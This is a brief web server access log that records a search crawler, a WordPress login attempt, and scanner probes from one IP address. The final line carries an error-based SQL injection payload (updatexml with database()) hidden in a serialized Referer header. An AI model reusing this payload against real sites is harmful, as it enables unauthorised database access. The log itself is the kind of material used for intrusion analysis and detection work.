66.249.64.105 - - [18/Oct/2025:13:08:36 -0400] "GET /products122707870?kg=0121211514 HTTP/1.1" 200 29299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.42.61.4 - - [18/Oct/2025:13:08:40 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCTE; rv:11.0) like Gecko"
66.42.61.4 - - [18/Oct/2025:13:08:48 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCTE; rv:11.0) like Gecko"
157.20.32.210 - - [18/Oct/2025:13:08:57 -0400] "POST /api/users HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
157.20.32.210 - - [18/Oct/2025:13:09:02 -0400] "GET /wp-login.php HTTP/1.1" 200 2344 "-" "Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:13:09:01 -0400] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:13:09:08 -0400] "GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1" 301 0 "554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:\"id\";s:49:\"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#\";}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15"
